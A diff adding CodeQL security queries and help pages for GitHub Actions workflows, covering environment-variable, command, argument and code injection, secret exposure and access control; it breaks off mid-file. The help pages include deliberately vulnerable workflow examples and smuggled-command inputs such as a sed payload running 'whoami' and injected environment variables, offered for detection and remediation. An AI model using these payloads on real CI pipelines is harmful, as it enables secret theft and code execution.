"$GITHUB_ENV" +``` + +It is also possible to define multiline variables by using the [following construct](https://en.wikipedia.org/wiki/Here_document): + +``` +KEY<<{delimiter} +VALUE +VALUE +{delimiter} +``` + +```bash +steps: + - name: Set the value in bash + id: step_one + run: | + { + echo 'JSON_RESPONSE<> "$GITHUB_ENV" +``` + +If an attacker can control the values assigned to environment variables and there is no sanitization in place, the attacker will be able to inject additional variables by injecting new lines or `{delimiters}`. + +## Recommendations + +1. **Do not allow untrusted data to influence environment variables**: + + - Avoid using untrusted data sources (e.g., artifact content) to define environment variables. + - Validate and sanitize all inputs before using them in environment settings. + +2. **Do not allow new lines when defining single line environment variables**: + + - `echo "BODY=$(echo "$BODY" | tr -d '\n')" >> "$GITHUB_ENV"` + +3. **Use unique identifiers when defining multi line environment variables**: + + ```bash + steps: + - name: Set the value in bash + id: step_one + run: | + # Generate a UUID + UUID=$(uuidgen) + { + echo "JSON_RESPONSE<> "$GITHUB_ENV" + ``` + +## Examples + +### Example of Vulnerability + +Consider the following basic setup where an environment variable `MYVAR` is set and used in subsequent steps: + +```yaml +steps: + - name: Set the value + id: step_one + env: + BODY: ${{ github.event.comment.body }} + run: | + REPLACED=$(echo "$BODY" | sed 's/FOO/BAR/g') + echo "MYVAR=$REPLACED" >> "$GITHUB_ENV" +``` + +If an attacker can manipulate the value being set, such as through artifact downloads or user inputs, the attacker can potentially inject new environment variables. For example, they could write an issue comment like: + +```text +FOO +NEW_ENV_VAR=MALICIOUS_VALUE +``` + +Likewise, if the attacker controls a file in the GitHub Actions Runner's workspace (eg: the workflow checkouts untrusted code or downloads an untrusted artifact) and the contents of that file are assigned to an environment variable such as: + +```bash +- run: | + PR_NUMBER=$(cat pr-number.txt) + echo "PR_NUMBER=$PR_NUMBER" >> $GITHUB_ENV +``` + +An attacker could craft a malicious artifact that writes dangerous environment variables: + +```bash + - run: | + echo -e "666\nNEW_ENV_VAR=MALICIOUS_VALUE" > pr-number.txt + - uses: actions/upload-artifact@v4 + with: + name: pr-number + path: ./pr-number.txt +``` + +### Exploitation + +An attacker is be able to run arbitrary code by injecting environment variables such as `LD_PRELOAD`, `BASH_ENV`, etc. + +## References + +- [Workflow commands for GitHub Actions](https://docs.github.com/en/actions/writing-workflows/choosing-what-your-workflow-does/workflow-commands-for-github-actions) +- [GitHub Actions Exploitation: Repo Jacking and Environment Manipulation](https://www.synacktiv.com/publications/github-actions-exploitation-repo-jacking-and-environment-manipulation) diff --git a/actions/ql/src/Security/CWE-077/EnvVarInjectionMedium.ql b/actions/ql/src/Security/CWE-077/EnvVarInjectionMedium.ql new file mode 100644 index 000000000000..c9af38a2c507 --- /dev/null +++ b/actions/ql/src/Security/CWE-077/EnvVarInjectionMedium.ql @@ -0,0 +1,37 @@ +/** + * @name Enviroment Variable built from user-controlled sources + * @description Building an environment variable from user-controlled sources may alter the execution of following system commands + * @kind path-problem + * @problem.severity warning + * @security-severity 5.0 + * @precision high + * @id actions/envvar-injection/medium + * @tags actions + * security + * external/cwe/cwe-077 + * external/cwe/cwe-020 + */ + +import actions +import codeql.actions.security.EnvVarInjectionQuery +import codeql.actions.dataflow.ExternalFlow +import codeql.actions.dataflow.FlowSources +import EnvVarInjectionFlow::PathGraph + +from EnvVarInjectionFlow::PathNode source, EnvVarInjectionFlow::PathNode sink +where + EnvVarInjectionFlow::flowPath(source, sink) and + inNonPrivilegedContext(sink.getNode().asExpr()) and + // exclude paths to file read sinks from non-artifact sources + ( + not source.getNode().(RemoteFlowSource).getSourceType() = "artifact" + or + source.getNode().(RemoteFlowSource).getSourceType() = "artifact" and + ( + sink.getNode() instanceof EnvVarInjectionFromFileReadSink or + madSink(sink.getNode(), "envvar-injection") + ) + ) +select sink.getNode(), source, sink, + "Potential environment variable injection in $@, which may be controlled by an external user.", + sink, sink.getNode().toString() diff --git a/actions/ql/src/Security/CWE-078/CommandInjectionCritical.ql b/actions/ql/src/Security/CWE-078/CommandInjectionCritical.ql new file mode 100644 index 000000000000..7d45b25b1a29 --- /dev/null +++ b/actions/ql/src/Security/CWE-078/CommandInjectionCritical.ql @@ -0,0 +1,30 @@ +/** + * @name Command built from user-controlled sources + * @description Building a system command from user-controlled sources is vulnerable to insertion of + * malicious code by the user. + * @kind path-problem + * @problem.severity error + * @security-severity 9 + * @precision very-high + * @id actions/command-injection/critical + * @tags actions + * security + * experimental + * external/cwe/cwe-078 + */ + +import actions +import codeql.actions.security.CommandInjectionQuery +import CommandInjectionFlow::PathGraph +import codeql.actions.security.ControlChecks + +from CommandInjectionFlow::PathNode source, CommandInjectionFlow::PathNode sink, Event event +where + CommandInjectionFlow::flowPath(source, sink) and + inPrivilegedContext(sink.getNode().asExpr(), event) and + not exists(ControlCheck check | + check.protects(sink.getNode().asExpr(), event, ["command-injection", "code-injection"]) + ) +select sink.getNode(), source, sink, + "Potential command injection in $@, which may be controlled by an external user ($@).", sink, + sink.getNode().asExpr().(Expression).getRawExpression(), event, event.getName() diff --git a/actions/ql/src/Security/CWE-078/CommandInjectionMedium.ql b/actions/ql/src/Security/CWE-078/CommandInjectionMedium.ql new file mode 100644 index 000000000000..8e7d72dded93 --- /dev/null +++ b/actions/ql/src/Security/CWE-078/CommandInjectionMedium.ql @@ -0,0 +1,26 @@ +/** + * @name Command built from user-controlled sources + * @description Building a system command from user-controlled sources is vulnerable to insertion of + * malicious code by the user. + * @kind path-problem + * @problem.severity warning + * @security-severity 5.0 + * @precision high + * @id actions/command-injection/medium + * @tags actions + * security + * experimental + * external/cwe/cwe-078 + */ + +import actions +import codeql.actions.security.CommandInjectionQuery +import CommandInjectionFlow::PathGraph + +from CommandInjectionFlow::PathNode source, CommandInjectionFlow::PathNode sink +where + CommandInjectionFlow::flowPath(source, sink) and + inNonPrivilegedContext(sink.getNode().asExpr()) +select sink.getNode(), source, sink, + "Potential command injection in $@, which may be controlled by an external user.", sink, + sink.getNode().asExpr().(Expression).getRawExpression() diff --git a/actions/ql/src/Security/CWE-088/ArgumentInjectionCritical.md b/actions/ql/src/Security/CWE-088/ArgumentInjectionCritical.md new file mode 100644 index 000000000000..92e480e4a7ae --- /dev/null +++ b/actions/ql/src/Security/CWE-088/ArgumentInjectionCritical.md @@ -0,0 +1,41 @@ +# Argument Injection in GitHub Actions + +## Description + +Passing user-controlled arguments to certain commands in the context of `Run` steps may lead to arbitrary code execution. + +Argument injection in GitHub Actions may allow an attacker to exfiltrate any secrets used in the workflow and the temporary GitHub repository authorization token. The token may have write access to the repository, allowing the attacker to make changes to the repository. + +## Recommendations + +When possible avoid passing user-controlled data to commands which may spawn new processes using some of their arguments. + +It is also recommended to limit the permissions of any tokens used by a workflow such as the GITHUB_TOKEN. + +## Examples + +### Incorrect Usage + +The following example lets a user inject an arbitrary shell command through argument injection: + +```yaml +on: issue_comment + +jobs: + echo-body: + runs-on: ubuntu-latest + steps: + - env: + BODY: ${{ github.event.comment.body }} + run: | + cat file.txt | sed "s/BODY_PLACEHOLDER/$BODY/g" > replaced.txt +``` + +An attacker may set the body of an Issue comment to `BAR/g;1e whoami;#` and the command `whoami` will get executed during the `sed` operation. + +## References + +- [Common Weakness Enumeration: CWE-88](https://cwe.mitre.org/data/definitions/88.html). +- [Argument Injection Explained](https://sonarsource.github.io/argument-injection-vectors/explained/) +- [Argument Injection Vectors](https://sonarsource.github.io/argument-injection-vectors/) +- [GTFOBins](https://gtfobins.github.io/) diff --git a/actions/ql/src/Security/CWE-088/ArgumentInjectionCritical.ql b/actions/ql/src/Security/CWE-088/ArgumentInjectionCritical.ql new file mode 100644 index 000000000000..6930e2f684a4 --- /dev/null +++ b/actions/ql/src/Security/CWE-088/ArgumentInjectionCritical.ql @@ -0,0 +1,29 @@ +/** + * @name Argument injection + * @description Passing unsanitized user input to a command that will run it as a subprocess. + * @kind path-problem + * @problem.severity error + * @security-severity 9 + * @precision very-high + * @id actions/argument-injection/critical + * @tags actions + * security + * experimental + * external/cwe/cwe-088 + */ + +import actions +import codeql.actions.security.ArgumentInjectionQuery +import ArgumentInjectionFlow::PathGraph +import codeql.actions.security.ControlChecks + +from ArgumentInjectionFlow::PathNode source, ArgumentInjectionFlow::PathNode sink, Event event +where + ArgumentInjectionFlow::flowPath(source, sink) and + inPrivilegedContext(sink.getNode().asExpr(), event) and + not exists(ControlCheck check | + check.protects(sink.getNode().asExpr(), event, "argument-injection") + ) +select sink.getNode(), source, sink, + "Potential argument injection in $@ command, which may be controlled by an external user ($@).", + sink, sink.getNode().(ArgumentInjectionSink).getCommand(), event, event.getName() diff --git a/actions/ql/src/Security/CWE-088/ArgumentInjectionMedium.md b/actions/ql/src/Security/CWE-088/ArgumentInjectionMedium.md new file mode 100644 index 000000000000..4957297be92a --- /dev/null +++ b/actions/ql/src/Security/CWE-088/ArgumentInjectionMedium.md @@ -0,0 +1,41 @@ +# Argument Injection in GitHub Actions + +## Description + +Passing user-controlled arguments to certain commands in the context of `Run` steps may lead to arbitrary code execution. + +Argument injection in GitHub Actions may allow an attacker to exfiltrate any secrets used in the workflow and the temporary GitHub repository authorization token. The token may have write access to the repository, allowing the attacker to make changes to the repository. + +## Recommendations + +When possible avoid passing user-controlled data to commands which may spawn new processes using some of their arguments. + +It is also recommended to limit the permissions of any tokens used by a workflow such as the GITHUB_TOKEN. + +## Examples + +### Incorrect Usage + +The following example lets a user inject an arbitrary shell command through argument injection: + +```yaml +on: issue_comment + +jobs: + echo-body: + runs-on: ubuntu-latest + steps: + - env: + BODY: ${{ github.event.comment.body }} + run: | + cat file.txt | sed "s/BODY_PLACEHOLDER/$BODY/g" > replaced.txt +``` + +An attacker may set the body of an Issue comment to `BAR|g;1e whoami;#` and the command `whoami` will get executed during the `sed` operation. + +## References + +- [Common Weakness Enumeration: CWE-88](https://cwe.mitre.org/data/definitions/88.html). +- [Argument Injection Explained](https://sonarsource.github.io/argument-injection-vectors/explained/) +- [Argument Injection Vectors](https://sonarsource.github.io/argument-injection-vectors/) +- [GTFOBins](https://gtfobins.github.io/) diff --git a/actions/ql/src/Security/CWE-088/ArgumentInjectionMedium.ql b/actions/ql/src/Security/CWE-088/ArgumentInjectionMedium.ql new file mode 100644 index 000000000000..37acbc051229 --- /dev/null +++ b/actions/ql/src/Security/CWE-088/ArgumentInjectionMedium.ql @@ -0,0 +1,25 @@ +/** + * @name Argument injection + * @description Passing unsanitized user input to a command that will run it as a subprocess. + * @kind path-problem + * @problem.severity warning + * @security-severity 5.0 + * @precision medium + * @id actions/argument-injection/medium + * @tags actions + * security + * experimental + * external/cwe/cwe-088 + */ + +import actions +import codeql.actions.security.ArgumentInjectionQuery +import ArgumentInjectionFlow::PathGraph + +from ArgumentInjectionFlow::PathNode source, ArgumentInjectionFlow::PathNode sink +where + ArgumentInjectionFlow::flowPath(source, sink) and + inNonPrivilegedContext(sink.getNode().asExpr()) +select sink.getNode(), source, sink, + "Potential argument injection in $@ command, which may be controlled by an external user.", sink, + sink.getNode().(ArgumentInjectionSink).getCommand() diff --git a/actions/ql/src/Security/CWE-094/CodeInjectionCritical.md b/actions/ql/src/Security/CWE-094/CodeInjectionCritical.md new file mode 100644 index 000000000000..f2e494468112 --- /dev/null +++ b/actions/ql/src/Security/CWE-094/CodeInjectionCritical.md @@ -0,0 +1,82 @@ +# Code Injection in GitHub Actions + +## Description + +Using user-controlled input in GitHub Actions may lead to code injection in contexts like _run:_ or _script:_. + +Code injection in GitHub Actions may allow an attacker to exfiltrate any secrets used in the workflow and the temporary GitHub repository authorization token. The token may have write access to the repository, allowing an attacker to make changes to the repository. + +## Recommendations + +The best practice to avoid code injection vulnerabilities in GitHub workflows is to set the untrusted input value of the expression to an intermediate environment variable and then use the environment variable using the native syntax of the shell/script interpreter (that is, not _${{ env.VAR }}_). + +It is also recommended to limit the permissions of any tokens used by a workflow such as the GITHUB_TOKEN. + +## Examples + +### Incorrect Usage + +The following example lets attackers inject an arbitrary shell command: + +```yaml +on: issue_comment + +jobs: + echo-body: + runs-on: ubuntu-latest + steps: + - run: | + echo '${{ github.event.comment.body }}' +``` + +The following example uses an environment variable, but **still allows the injection** because of the use of expression syntax: + +```yaml +on: issue_comment + +jobs: + echo-body: + runs-on: ubuntu-latest + steps: + - env: + BODY: ${{ github.event.issue.body }} + run: | + echo '${{ env.BODY }}' +``` + +### Correct Usage + +The following example uses shell syntax to read the environment variable and will prevent the attack: + +```yaml +jobs: + echo-body: + runs-on: ubuntu-latest + steps: + - env: + BODY: ${{ github.event.issue.body }} + run: | + echo "$BODY" +``` + +The following example uses `process.env` to read environment variables within JavaScript code. + +```yaml +jobs: + echo-body: + runs-on: ubuntu-latest + steps: + - uses: uses: actions/github-script@v4 + env: + BODY: ${{ github.event.issue.body }} + with: + script: | + const { BODY } = process.env + ... +``` + +## References + +- GitHub Security Lab Research: [Keeping your GitHub Actions and workflows secure: Untrusted input](https://securitylab.github.com/research/github-actions-untrusted-input). +- GitHub Docs: [Security hardening for GitHub Actions](https://docs.github.com/en/actions/security-guides/security-hardening-for-github-actions). +- GitHub Docs: [Permissions for the GITHUB_TOKEN](https://docs.github.com/en/actions/security-guides/automatic-token-authentication#permissions-for-the-github_token). diff --git a/actions/ql/src/Security/CWE-094/CodeInjectionCritical.ql b/actions/ql/src/Security/CWE-094/CodeInjectionCritical.ql new file mode 100644 index 000000000000..c4ab00837ca7 --- /dev/null +++ b/actions/ql/src/Security/CWE-094/CodeInjectionCritical.ql @@ -0,0 +1,36 @@ +/** + * @name Code injection + * @description Interpreting unsanitized user input as code allows a malicious user to perform arbitrary + * code execution. + * @kind path-problem + * @problem.severity error + * @security-severity 9 + * @precision very-high + * @id actions/code-injection/critical + * @tags actions + * security + * external/cwe/cwe-094 + * external/cwe/cwe-095 + * external/cwe/cwe-116 + */ + +import actions +import codeql.actions.security.CodeInjectionQuery +import CodeInjectionFlow::PathGraph +import codeql.actions.security.ControlChecks + +from CodeInjectionFlow::PathNode source, CodeInjectionFlow::PathNode sink, Event event +where + CodeInjectionFlow::flowPath(source, sink) and + inPrivilegedContext(sink.getNode().asExpr(), event) and + source.getNode().(RemoteFlowSource).getEventName() = event.getName() and + not exists(ControlCheck check | check.protects(sink.getNode().asExpr(), event, "code-injection")) and + // exclude cases where the sink is a JS script and the expression uses toJson + not exists(UsesStep script | + script.getCallee() = "actions/github-script" and + script.getArgumentExpr("script") = sink.getNode().asExpr() and + exists(getAToJsonReferenceExpression(sink.getNode().asExpr().(Expression).getExpression(), _)) + ) +select sink.getNode(), source, sink, + "Potential code injection in $@, which may be controlled by an external user ($@).", sink, + sink.getNode().asExpr().(Expression).getRawExpression(), event, event.getName() diff --git a/actions/ql/src/Security/CWE-094/CodeInjectionMedium.md b/actions/ql/src/Security/CWE-094/CodeInjectionMedium.md new file mode 100644 index 000000000000..f2e494468112 --- /dev/null +++ b/actions/ql/src/Security/CWE-094/CodeInjectionMedium.md @@ -0,0 +1,82 @@ +# Code Injection in GitHub Actions + +## Description + +Using user-controlled input in GitHub Actions may lead to code injection in contexts like _run:_ or _script:_. + +Code injection in GitHub Actions may allow an attacker to exfiltrate any secrets used in the workflow and the temporary GitHub repository authorization token. The token may have write access to the repository, allowing an attacker to make changes to the repository. + +## Recommendations + +The best practice to avoid code injection vulnerabilities in GitHub workflows is to set the untrusted input value of the expression to an intermediate environment variable and then use the environment variable using the native syntax of the shell/script interpreter (that is, not _${{ env.VAR }}_). + +It is also recommended to limit the permissions of any tokens used by a workflow such as the GITHUB_TOKEN. + +## Examples + +### Incorrect Usage + +The following example lets attackers inject an arbitrary shell command: + +```yaml +on: issue_comment + +jobs: + echo-body: + runs-on: ubuntu-latest + steps: + - run: | + echo '${{ github.event.comment.body }}' +``` + +The following example uses an environment variable, but **still allows the injection** because of the use of expression syntax: + +```yaml +on: issue_comment + +jobs: + echo-body: + runs-on: ubuntu-latest + steps: + - env: + BODY: ${{ github.event.issue.body }} + run: | + echo '${{ env.BODY }}' +``` + +### Correct Usage + +The following example uses shell syntax to read the environment variable and will prevent the attack: + +```yaml +jobs: + echo-body: + runs-on: ubuntu-latest + steps: + - env: + BODY: ${{ github.event.issue.body }} + run: | + echo "$BODY" +``` + +The following example uses `process.env` to read environment variables within JavaScript code. + +```yaml +jobs: + echo-body: + runs-on: ubuntu-latest + steps: + - uses: uses: actions/github-script@v4 + env: + BODY: ${{ github.event.issue.body }} + with: + script: | + const { BODY } = process.env + ... +``` + +## References + +- GitHub Security Lab Research: [Keeping your GitHub Actions and workflows secure: Untrusted input](https://securitylab.github.com/research/github-actions-untrusted-input). +- GitHub Docs: [Security hardening for GitHub Actions](https://docs.github.com/en/actions/security-guides/security-hardening-for-github-actions). +- GitHub Docs: [Permissions for the GITHUB_TOKEN](https://docs.github.com/en/actions/security-guides/automatic-token-authentication#permissions-for-the-github_token). diff --git a/actions/ql/src/Security/CWE-094/CodeInjectionMedium.ql b/actions/ql/src/Security/CWE-094/CodeInjectionMedium.ql new file mode 100644 index 000000000000..0f8b6e13a290 --- /dev/null +++ b/actions/ql/src/Security/CWE-094/CodeInjectionMedium.ql @@ -0,0 +1,33 @@ +/** + * @name Code injection + * @description Interpreting unsanitized user input as code allows a malicious user to perform arbitrary + * code execution. + * @kind path-problem + * @problem.severity warning + * @security-severity 5.0 + * @precision medium + * @id actions/code-injection/medium + * @tags actions + * security + * external/cwe/cwe-094 + * external/cwe/cwe-095 + * external/cwe/cwe-116 + */ + +import actions +import codeql.actions.security.CodeInjectionQuery +import CodeInjectionFlow::PathGraph + +from CodeInjectionFlow::PathNode source, CodeInjectionFlow::PathNode sink +where + CodeInjectionFlow::flowPath(source, sink) and + inNonPrivilegedContext(sink.getNode().asExpr()) and + // exclude cases where the sink is a JS script and the expression uses toJson + not exists(UsesStep script | + script.getCallee() = "actions/github-script" and + script.getArgumentExpr("script") = sink.getNode().asExpr() and + exists(getAToJsonReferenceExpression(sink.getNode().asExpr().(Expression).getExpression(), _)) + ) +select sink.getNode(), source, sink, + "Potential code injection in $@, which may be controlled by an external user.", sink, + sink.getNode().asExpr().(Expression).getRawExpression() diff --git a/actions/ql/src/Security/CWE-1395/UseOfKnownVulnerableAction.md b/actions/ql/src/Security/CWE-1395/UseOfKnownVulnerableAction.md new file mode 100644 index 000000000000..91360a30ed88 --- /dev/null +++ b/actions/ql/src/Security/CWE-1395/UseOfKnownVulnerableAction.md @@ -0,0 +1,13 @@ +# Use of Actions with known vulnerabilities + +## Description + +The security of the workflow and the repository could be compromised by GitHub Actions workflows that utilize GitHub Actions with known vulnerabilities. + +## Recommendations + +Either remove the component from the workflow or upgrade it to a version that is not vulnerable. + +## References + +- [GitHub Docs: Keeping your actions up to date with Dependabot](https://docs.github.com/en/code-security/dependabot/working-with-dependabot/keeping-your-actions-up-to-date-with-dependabot) diff --git a/actions/ql/src/Security/CWE-1395/UseOfKnownVulnerableAction.ql b/actions/ql/src/Security/CWE-1395/UseOfKnownVulnerableAction.ql new file mode 100644 index 000000000000..497a3b9feb9b --- /dev/null +++ b/actions/ql/src/Security/CWE-1395/UseOfKnownVulnerableAction.ql @@ -0,0 +1,20 @@ +/** + * @name Use of a known vulnerable action. + * @description The workflow is using an action with known vulnerabilities. + * @kind problem + * @problem.severity error + * @security-severity 7.5 + * @precision high + * @id actions/vulnerable-action + * @tags actions + * security + * external/cwe/cwe-1395 + */ + +import actions +import codeql.actions.security.UseOfKnownVulnerableActionQuery + +from KnownVulnerableAction step +select step, + "The workflow is using a known vulnerable version ($@) of the $@ action. Update it to $@", step, + step.getVersion(), step, step.getCallee(), step, step.getFixedVersion() diff --git a/actions/ql/src/Security/CWE-200/SecretExfiltration.ql b/actions/ql/src/Security/CWE-200/SecretExfiltration.ql new file mode 100644 index 000000000000..2e583a989893 --- /dev/null +++ b/actions/ql/src/Security/CWE-200/SecretExfiltration.ql @@ -0,0 +1,23 @@ +/** + * @name Secret exfiltration + * @description Secrets may be exfiltrated by an attacker who can control the data sent to an external service. + * @kind path-problem + * @problem.severity error + * @security-severity 9.0 + * @precision high + * @id actions/secret-exfiltration + * @tags actions + * security + * experimental + * external/cwe/cwe-200 + */ + +import actions +import codeql.actions.security.SecretExfiltrationQuery +import SecretExfiltrationFlow::PathGraph + +from SecretExfiltrationFlow::PathNode source, SecretExfiltrationFlow::PathNode sink +where SecretExfiltrationFlow::flowPath(source, sink) +select sink.getNode(), source, sink, + "Potential secret exfiltration in $@, which may be be leaked to an attacker-controlled resource.", + sink, sink.getNode().asExpr().(Expression).getRawExpression() diff --git a/actions/ql/src/Security/CWE-275/MissingActionsPermissions.md b/actions/ql/src/Security/CWE-275/MissingActionsPermissions.md new file mode 100644 index 000000000000..9385759dae95 --- /dev/null +++ b/actions/ql/src/Security/CWE-275/MissingActionsPermissions.md @@ -0,0 +1,30 @@ +# Actions Job and Workflow Permissions are not set + +## Description + +If a GitHub Actions job or workflow has no explicit permissions set, then the repository permissions are used. Repositories created under organizations inherit the organization permissions. The organizations or repositories created before February 2023 have the default permissions set to read-write. Often these permissions do not adhere to the principle of least privilege and can be reduced to read-only, leaving the `write` permission only to a specific types as `issues: write` or `pull-requests: write`. + +## Recommendations + +Add the `permissions` key to the job or the root of workflow (in this case it is applied to all jobs in the workflow that do not have their own `permissions` key) and assign the least privileges required to complete the task: + +```yaml +name: "My workflow" +permissions: + contents: read + pull-requests: write +``` + +or + +```yaml +jobs: + my-job: + permissions: + contents: read + pull-requests: write +``` + +## References + +- [Assigning permissions to jobs](https://docs.github.com/en/actions/writing-workflows/choosing-what-your-workflow-does/assigning-permissions-to-jobs) diff --git a/actions/ql/src/Security/CWE-275/MissingActionsPermissions.ql b/actions/ql/src/Security/CWE-275/MissingActionsPermissions.ql new file mode 100644 index 000000000000..d2969b7d6e72 --- /dev/null +++ b/actions/ql/src/Security/CWE-275/MissingActionsPermissions.ql @@ -0,0 +1,25 @@ +/** + * @name Workflow does not contain permissions + * @description Workflows should contain permissions to provide a clear understanding has permissions to run the workflow. + * @kind problem + * @security-severity 5.0 + * @problem.severity recommendation + * @precision high + * @id actions/missing-workflow-permissions + * @tags actions + * maintainability + * external/cwe/cwe-275 + */ + +import actions + +from Job job +where + not exists(job.getPermissions()) and + not exists(job.getEnclosingWorkflow().getPermissions()) and + // exists a trigger event that is not a workflow_call + exists(Event e | + e = job.getATriggerEvent() and + not e.getName() = "workflow_call" + ) +select job, "Actions Job or Workflow does not set permissions" diff --git a/actions/ql/src/Security/CWE-284/CodeExecutionOnSelfHostedRunner.ql b/actions/ql/src/Security/CWE-284/CodeExecutionOnSelfHostedRunner.ql new file mode 100644 index 000000000000..9610302d1c2a --- /dev/null +++ b/actions/ql/src/Security/CWE-284/CodeExecutionOnSelfHostedRunner.ql @@ -0,0 +1,19 @@ +/** + * @name Pull Request code execution on self-hosted runner + * @description Running untrusted code on a public repository's self-hosted runner can lead to the compromise of the runner machine + * @kind problem + * @problem.severity error + * @security-severity 9.0 + * @precision high + * @id actions/pr-on-self-hosted-runner + * @tags actions + * security + * experimental + * external/cwe/cwe-284 + */ + +import codeql.actions.security.SelfHostedQuery + +from Job job +where staticallyIdentifiedSelfHostedRunner(job) or dynamicallyIdentifiedSelfHostedRunner(job) +select job, "Job runs on self-hosted runner" diff --git a/actions/ql/src/Security/CWE-285/ImproperAccessControl.md b/actions/ql/src/Security/CWE-285/ImproperAccessControl.md new file mode 100644 index 000000000000..594f381d8ce0 --- /dev/null +++ b/actions/ql/src/Security/CWE-285/ImproperAccessControl.md @@ -0,0 +1,60 @@ +# Improper Access Control + +## Description + +Sometimes labels are used to approve GitHub Actions. An authorization check may not be properly implemented, allowing an attacker to mutate the code after it has been reviewed and approved by label. + +## Recommendations + +When using labels, make sure that the code cannot be modified after it has been reviewed and the label has been set. + +## Examples + +### Incorrect Usage + +The following example shows a job that requires the label `safe to test` to be set before running untrusted code. There are two problems with the code: + +1. The workflow gets triggered on `synchronize` activity type and, therefore, it will get triggered every time there is a change in the Pull Request. An attacker can modify the code of the Pull Request after the code has been reviewed and the label has been set. The workflow will be triggered every time a new change is added to the Pull Request. +2. The workflow uses `ref: ${{ github.event.pull_request.head.ref }}` for checkout, which is a branch name of the Pull Request. There is a window of opportunity for the attacker to modify their branch after the Pull Request is labeled, but before the workflow starts and runs the checkout. + +```yaml +on: + pull_request_target: + types: [opened, synchronize] + +jobs: + test: + runs-on: ubuntu-latest + steps: + - name: Checkout repo for OWNER TEST + uses: actions/checkout@v3 + if: contains(github.event.pull_request.labels.*.name, 'safe to test') + with: + ref: ${{ github.event.pull_request.head.ref }} + - run: ./cmd +``` + +### Correct Usage + +Make sure that the workflow only gets triggered when the label is set and use an immutable commit (`github.event.pull_request.head.sha`) instead of a mutable reference. + +```yaml +on: + pull_request_target: + types: [labeled] + +jobs: + test: + runs-on: ubuntu-latest + steps: + - name: Checkout repo for OWNER TEST + uses: actions/checkout@v3 + if: contains(github.event.pull_request.labels.*.name, 'safe to test') + with: + ref: ${{ github.event.pull_request.head.sha}} + - run: ./cmd +``` + +## References + +- [Events that trigger workflows](https://docs.github.com/en/actions/writing-workflows/choosing-when-your-workflow-runs/events-that-trigger-workflows#pull_request_target) diff --git a/actions/ql/src/Security/CWE-285/ImproperAccessControl.ql b/actions/ql/src/Security/CWE-285/ImproperAccessControl.ql new file mode 100644 index 000000000000..ba002f16a874 --- /dev/null +++ b/actions/ql/src/Security/CWE-285/ImproperAccessControl.ql @@ -0,0 +1,30 @@ +/** + * @name Improper Access Control + * @description The access control mechanism is not properly implemented, allowing untrusted code to be executed in a privileged context. + * @kind problem + * @problem.severity error + * @precision high + * @security-severity 9.3 + * @id actions/improper-access-control + * @tags actions + * security + * external/cwe/cwe-285 + */ + +import codeql.actions.security.UntrustedCheckoutQuery +import codeql.actions.security.ControlChecks + +from LocalJob job, LabelCheck check, MutableRefCheckoutStep checkout, Event event +where + job.isPrivileged() and + job.getAStep() = checkout and + check.dominates(checkout) and + ( + job.getATriggerEvent() = event and + event.getName() = "pull_request_target" and + event.getAnActivityType() = "synchronize" + or + not exists(job.getATriggerEvent()) + ) +select checkout, "The checked-out code can be modified after the authorization check $@.", check, + check.toString() diff --git a/actions/ql/src/Security/CWE-312/ExcessiveSecretsExposure.md b/actions/ql/src/Security/CWE-312/ExcessiveSecretsExposure.md new file mode 100644 index 000000000000..9351af5cf1e2 --- /dev/null +++ b/actions/ql/src/Security/CWE-312/ExcessiveSecretsExposure.md @@ -0,0 +1,52 @@ +# Excessive Secrets Exposure + +## Description + +When the workflow runner cannot determine what secrets are needed to run the workflow, it will pass all the available secrets to the runner including organization and repository secrets. This violates the least privileged principle and increases the impact of a potential vulnerability affecting the workflow. + +## Recommendations + +Only pass those secrets that are needed by the workflow. Avoid using expressions such as `toJSON(secrets)` or dynamically accessed secrets such as `secrets[format('GH_PAT_%s', matrix.env)]` since the workflow will need to receive all secrets to decide at runtime which one needs to be used. + +## Examples + +### Incorrect Usage + +```yaml +env: + ALL_SECRETS: ${{ toJSON(secrets) }} +``` + +```yaml +strategy: + matrix: + env: [PROD, DEV] +env: + GH_TOKEN: ${{ secrets[format('GH_PAT_%s', matrix.env)] }} +``` + +### Correct Usage + +```yaml +env: + NEEDED_SECRET: ${{ secrets.GH_PAT }} +``` + +```yaml +strategy: + matrix: + env: [PROD, DEV] +--- +if: matrix.env == "PROD" +env: + GH_TOKEN: ${{ secrets.GH_PAT_PROD }} +--- +if: matrix.env == "DEV" +env: + GH_TOKEN: ${{ secrets.GH_PAT_DEV }} +``` + +## References + +- [Using secrets in GitHub Actions](https://docs.github.com/en/actions/security-for-github-actions/security-guides/using-secrets-in-github-actions#using-encrypted-secrets-in-a-workflow) +- [Job uses all secrets](https://github.com/boostsecurityio/poutine/blob/main/docs/content/en/rules/job_all_secrets.md) diff --git a/actions/ql/src/Security/CWE-312/ExcessiveSecretsExposure.ql b/actions/ql/src/Security/CWE-312/ExcessiveSecretsExposure.ql new file mode 100644 index 000000000000..c1d22e3a1811 --- /dev/null +++ b/actions/ql/src/Security/CWE-312/ExcessiveSecretsExposure.ql @@ -0,0 +1,23 @@ +/** + * @name Excessive Secrets Exposure + * @description All organization and repository secrets are passed to the workflow runner. + * @kind problem + * @problem.severity recommendation + * @id actions/excessive-secrets-exposure + * @tags actions + * security + * external/cwe/cwe-312 + */ + +import actions +import codeql.actions.ast.internal.Ast + +from Expression expr +where + getAToJsonReferenceExpression(expr.getExpression(), _).matches("secrets%") + or + expr.getExpression().matches("secrets[%") and + not expr.getExpression().matches("secrets[\"%") and + not expr.getExpression().matches("secrets['%") +select expr, "All organization and repository secrets are passed to the workflow runner in $@", + expr, expr.getExpression() diff --git a/actions/ql/src/Security/CWE-312/SecretsInArtifacts.md b/actions/ql/src/Security/CWE-312/SecretsInArtifacts.md new file mode 100644 index 000000000000..5b05c9a118fa --- /dev/null +++ b/actions/ql/src/Security/CWE-312/SecretsInArtifacts.md @@ -0,0 +1,47 @@ +# Storage of sensitive information in GitHub Actions artifact + +## Description + +Sensitive information included in a GitHub Actions artifact can allow an attacker to access the sensitive information if the artifact is published. + +## Recommendation + +Only store information that is meant to be publicly available in a GitHub Actions artifact. + +## Example + +The following example uses `actions/checkout` to checkout code which stores the GITHUB_TOKEN in the \`.git/config\` file and then stores the contents of the \`.git\` repository into the artifact: + +```yaml +name: secrets-in-artifacts +on: + pull_request: +jobs: + a-job: # VULNERABLE + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + - name: "Upload artifact" + uses: actions/upload-artifact@1746f4ab65b179e0ea60a494b83293b640dd5bba # v4.3.2 + with: + name: file + path: . +``` + +The issue has been fixed below, where the `actions/upload-artifact` uses a version (v4+) which does not include hidden files or directories into the artifact. + +```yaml +name: secrets-in-artifacts +on: + pull_request: +jobs: + a-job: # NOT VULNERABLE + 